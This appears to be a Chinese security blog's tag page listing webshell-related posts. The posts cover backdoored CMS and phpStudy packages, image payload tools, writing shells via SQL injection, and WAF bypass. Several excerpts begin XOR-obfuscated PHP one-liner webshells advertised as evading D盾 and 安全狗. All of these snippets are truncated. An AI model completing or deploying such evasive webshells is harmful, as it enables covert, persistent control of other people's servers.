webshell

关注网络安全,网络安全博客

苹果CMS/MacCMS V10后门WebShell,第三方下载注意

苹果CMS/MacCMS V10后门WebShell,第三方下载注意

苹果CMS/MacCMS苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。MacCMS后门Webshell某天...

phpStudy后门RCE,复现/批量脚本/修复

phpStudy后门RCE,复现/批量脚本/修复

phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,...

pixload:图片Payload创建注入工具

pixload:图片Payload创建注入工具

pixload用于创建/将Payload注入图片的工具集。其用途与安全防范场景例如:绕过CSP防护,用图片隐藏恶意攻击代码,在图片中编码webshell,利用图片进行XSS等等。pixload安装需要以下Perl模块:GD...

v33异或免杀PHP一句话

v33异或免杀PHP一句话

venom 33的更新,webshell免杀PHP一句话,体积更小了。<?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } }...

ArbitraryPHP – 后门姿势,任意PHP代码执行扩展

ArbitraryPHP – 后门姿势,任意PHP代码执行扩展

ArbitraryPHP - 任意PHP代码执行扩展这是一个实验性的PHP扩展,加载这个扩展后,每次请求将可以执行一段自己的PHP代码。可用于:管理目标PHP站点(webshell)HOOK与分析HTTP执行流程在不修改源代码...

+免杀PHP一句话一枚

+免杀PHP一句话一枚

免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...

单文件PHP shell脚本:p0wny@shell

单文件PHP shell脚本:p0wny@shell

p0wny @hell:单文件PHP Shellp0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时,它可用于在服务器上快速执行命令。请谨慎使用:此脚本表示服务器存在安全风险,它是类似于webshell的脚本...

MySQL注入点写WebShell的5种方式

MySQL注入点写WebShell的5种方式

SQL写WebShell条件在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录。未开启全局gpc。环境准备存在SQL注入的URL,测试语句h...

CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF

CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF

CaidaoMitmProxy基于HTTP代理中转中国菜刀过WAF,基于菜刀20160622版本修改和测试。理论上是支持低版本菜刀。本人没测试希望大家来帮忙测试下。安装pip[3] install pydespip[3] install mitmproxy...

免杀WebShell PHP一句话,过D盾

免杀WebShell PHP一句话,过D盾

免杀PHP一句话过最新D盾等,webshell变量随机,增加流量传输编码方式免杀webshell PHP一句话class LTDS { public function __destruct() { $bxo='X'^"\x39"; $woa='?'^"\x4...